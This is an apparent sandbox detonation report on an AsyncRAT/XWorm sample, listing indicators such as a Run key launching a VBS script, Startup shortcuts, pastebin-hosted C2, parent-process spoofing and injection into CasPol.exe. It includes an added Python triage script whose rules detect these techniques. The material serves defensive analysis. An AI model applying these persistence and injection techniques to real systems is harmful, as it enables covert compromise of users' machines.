Malware Analysis Report

2024-10-19 06:56

Sample ID 240628-pknb8ayhjg
Target .
SHA256 6e6856c0003a452f331ac9f2c7d73c28ca0d1924763b43544dfa1a65cc92b68d
Tags
asyncrat xworm default venom clients execution persistence rat trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

6e6856c0003a452f331ac9f2c7d73c28ca0d1924763b43544dfa1a65cc92b68d

Threat Level: Known bad

The file . was found to be: Known bad.

Malicious Activity Summary

asyncrat xworm default venom clients execution persistence rat trojan

Detect Xworm Payload

Suspicious use of NtCreateUserProcessOtherParentProcess

Xworm

AsyncRat

Async RAT payload

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Executes dropped EXE

Loads dropped DLL

Drops startup file

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Suspicious use of SetThreadContext

Drops file in System32 directory

Enumerates physical storage devices

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of FindShellTrayWindow

Suspicious use of AdjustPrivilegeToken

Opens file in notepad (likely ransom note)

NTFS ADS

Views/modifies file attributes

Delays execution with timeout.exe

Suspicious behavior: EnumeratesProcesses

Suspicious use of SetWindowsHookEx

Modifies registry class

Suspicious use of SendNotifyMessage

Suspicious behavior: GetForegroundWindowSpam

Enumerates system info in registry

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-28 12:23

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-28 12:23

Reported

2024-06-28 12:36

Platform

win11-20240508-en

Max time kernel

780s

Max time network

786s

Command Line

C:\Windows\Explorer.EXE

Signatures

AsyncRat

rat asyncrat

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A (3 identical entries)

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 416 created 3312 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\Explorer.EXE (2 identical entries)
PID 3108 created 3312 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\Explorer.EXE (2 identical entries)
PID 4768 created 3312 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\Explorer.EXE (2 identical entries)
PID 1440 created 3312 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\Explorer.EXE (2 identical entries)
PID 2420 created 3312 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\Explorer.EXE (2 identical entries)
PID 3496 created 3312 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\Explorer.EXE (2 identical entries)
PID 1864 created 3312 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\Explorer.EXE (2 identical entries)

Xworm

trojan rat xworm

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A (3 identical entries)

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A (59 identical entries)
N/A N/A C:\Windows\System32\WScript.exe N/A (5 identical entries)

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\notepad.lnk C:\Windows\System32\notepad.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\notepad.lnk C:\Windows\System32\notepad.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk C:\Windows\System32\notepad.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk C:\Windows\System32\notepad.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A (42 identical entries)

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000\Software\Microsoft\Windows\CurrentVersion\Run\Path = "C:\\ProgramData\\embetesgar.vbs" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A (3 identical entries)

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4152 set thread context of 6884 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
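The signature tables above are exported as flat, space-separated rows, which makes them awkward to load into a SIEM or to compare across samples. The Python below is an editor-added example and not the sandbox vendor's code: it takes rows copied from this report (the parent-spoofing, Run key, Startup shortcut, pastebin and SetThreadContext entries), recovers the four columns by anchoring on the fixed Description vocabulary (the only reliable delimiter, since paths and registry values contain spaces), and runs a few triage rules over the result. The ATT&CK technique IDs, the ABUSED_HOSTING domain list and the SCRIPT_EXT list are this example's own assumptions, not something the report states.

```python
"""Turn the flattened signature rows of this report into structured events
and run a few triage rules over them.

Editor-added example; not part of the sandbox's own tooling. The rows in
REPORT_ROWS are copied from the signature tables above. The ATT&CK technique
IDs attached to each finding are this example's mapping, not the sandbox's.
"""
import re
from collections import Counter
from typing import NamedTuple

# Rows copied verbatim from the report's "Description Indicator Process Target" tables.
REPORT_ROWS = [
    r'PID 416 created 3312 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\Explorer.EXE',
    r'N/A N/A C:\Windows\System32\WScript.exe N/A',
    r'File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk C:\Windows\System32\notepad.exe N/A',
    r'Set value (str) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000\Software\Microsoft\Windows\CurrentVersion\Run\Path = "C:\\ProgramData\\embetesgar.vbs" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A',
    r'N/A pastebin.com N/A N/A',
    r'PID 4152 set thread context of 6884 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe',
]

# The Description column comes from a small fixed vocabulary; anchoring on it
# lets the Indicator column (paths and registry values containing spaces) be
# recovered even though the export separates columns with plain spaces.
DESC = (r'File created|File opened for modification|Key created|Key opened|'
        r'Key value queried|Set value \((?:str|int|data)\)|'
        r'PID \d+ created \d+|PID \d+ set thread context of \d+|N/A')
PATH = r'[A-Za-z]:\\.*?\.exe'          # Process/Target are always executables or N/A
ROW_RE = re.compile(
    rf'^(?P<description>{DESC})\s+(?P<indicator>.+?)\s+'
    rf'(?P<process>N/A|{PATH})\s+(?P<target>N/A|{PATH})$', re.IGNORECASE)


class Event(NamedTuple):
    description: str
    indicator: str
    process: str
    target: str


def parse_row(row: str) -> Event:
    m = ROW_RE.match(row.strip())
    if not m:
        raise ValueError(f'unrecognised row layout: {row!r}')
    return Event(**m.groupdict())


def basename(path: str) -> str:
    return path.rsplit('\\', 1)[-1].lower()


ABUSED_HOSTING = {'pastebin.com'}   # assumption: services to flag as staging/C2 hosts
SCRIPT_EXT = ('.vbs', '.js', '.jse', '.wsf', '.bat', '.cmd', '.ps1', '.hta')
STARTUP_DIR = '\\start menu\\programs\\startup\\'


def triage(ev: Event) -> list[str]:
    """Return human-readable findings for one event (empty list if nothing fires)."""
    desc, low = ev.description.lower(), ev.indicator.lower()
    findings = []
    # Run key whose value launches a script (T1547.001).
    if desc.startswith('set value') and '\\currentversion\\run\\' in low and ' = ' in ev.indicator:
        value = ev.indicator.split(' = ', 1)[1].strip('"').replace('\\\\', '\\')
        if value.lower().endswith(SCRIPT_EXT):
            findings.append(f'T1547.001 Run key launches script {value}')
    # Shortcut written to the per-user Startup folder (T1547.001).
    if desc.startswith('file created') and STARTUP_DIR in low and low.endswith('.lnk'):
        findings.append(f'T1547.001 startup shortcut {basename(ev.indicator)} written by {basename(ev.process)}')
    # Child created under a parent other than the creator: PPID spoofing (T1134.004).
    if re.match(r'pid \d+ created \d+', desc) and ev.target != 'N/A' \
            and basename(ev.process) != basename(ev.target):
        findings.append(f'T1134.004 {basename(ev.process)} spawned a child parented to {basename(ev.target)}')
    # SetThreadContext on another process: hollowing / injection (T1055.012).
    if 'set thread context' in desc and ev.target != 'N/A':
        findings.append(f'T1055.012 {basename(ev.process)} set thread context in {basename(ev.target)}')
    # Contact with a hosting service commonly abused for staging / C2 (T1102).
    if low in ABUSED_HOSTING:
        findings.append(f'T1102 contact with {ev.indicator}')
    return findings


def summarize(rows: list[str]) -> dict[str, int]:
    """Map each finding to how many report rows produced it (identical rows collapse)."""
    report: dict[str, int] = {}
    for ev, n in Counter(parse_row(r) for r in rows).items():
        for finding in triage(ev):
            report[finding] = report.get(finding, 0) + n
    return report


if __name__ == '__main__':
    for finding, n in summarize(REPORT_ROWS).items():
        print(f'{n:>3}  {finding}')
```

The regex relies on two properties of this export that hold for every table on the page: the Description cell is drawn from a short fixed vocabulary, and the Process and Target cells are either N/A or a path ending in .exe. Rows from other tables (the shellbag "Modifies registry class" entries, for instance) parse the same way, and anything that does not fit raises rather than silently mis-splitting a column.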

Enumerates physical storage devices

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A (3 identical entries)

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (data) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259} C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\1 = 8c00310000000000a858086d110050524f4752417e310000740009000400efbec5525961a858086d2e0000003f0000000000010000000000000000004a00000000002658e200500072006f006700720061006d002000460069006c0065007300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100370038003100000018000000 C:\Windows\system32\OpenWith.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" C:\Windows\system32\OpenWith.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" C:\Windows\system32\OpenWith.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616257" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616257" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 C:\Windows\system32\OpenWith.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" C:\Windows\system32\OpenWith.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\MRUListEx = 020000000100000000000000ffffffff C:\Windows\system32\OpenWith.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Version = "1" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202 C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4 C:\Windows\system32\OpenWith.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" C:\Windows\system32\OpenWith.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" C:\Windows\system32\OpenWith.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e8005398e082303024b98265d99428e115f0000 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0000000001000000ffffffff C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags C:\Windows\system32\OpenWith.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\1\MRUListEx = ffffffff C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} C:\Windows\system32\OpenWith.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\2\0 = 5a00310000000000dc58f962100053797374656d33320000420009000400efbec5522d60dc58f9622e0000008f36000000000100000000000000000000000000000037051301530079007300740065006d0033003200000018000000 C:\Windows\system32\OpenWith.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \Registry\User\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\NotificationData C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings C:\Windows\System32\notepad.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\SniffedFolderType = "Generic" C:\Windows\system32\OpenWith.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" C:\Windows\system32\OpenWith.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Downloads" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\2 C:\Windows\system32\OpenWith.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202 C:\Windows\system32\OpenWith.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" C:\Windows\system32\OpenWith.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202 C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg C:\Windows\system32\OpenWith.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\MRUListEx = 0100000000000000ffffffff C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Windows\system32\OpenWith.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" C:\Windows\system32\OpenWith.exe N/A

NTFS ADS

Description Indicator Process Target
File opened for modification C:\Users\Admin\Downloads\Unconfirmed 153799.crdownload:SmartScreen C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Users\Admin\Downloads\new.bat:Zone.Identifier C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Users\Admin\Downloads\Unconfirmed 335134.crdownload:SmartScreen C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Users\Admin\Downloads\startupppp.bat:Zone.Identifier C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A (2 identical entries)
Note: this is a generic heuristic that fires on any notepad.exe activity. In this run notepad.exe is also the process that writes the Startup shortcuts listed under "Drops startup file", and no file-encryption activity is recorded anywhere in this report, so the ransomware tag should be treated as unconfirmed.

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A (18 identical entries)
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe N/A (2 identical entries)
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A (26 identical entries)
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A (7 identical entries)
N/A N/A C:\Windows\System32\notepad.exe N/A (11 identical entries)

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\System32\notepad.exe N/A
N/A N/A C:\Windows\System32\notepad.exe N/A
N/A N/A C:\Windows\System32\notepad.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
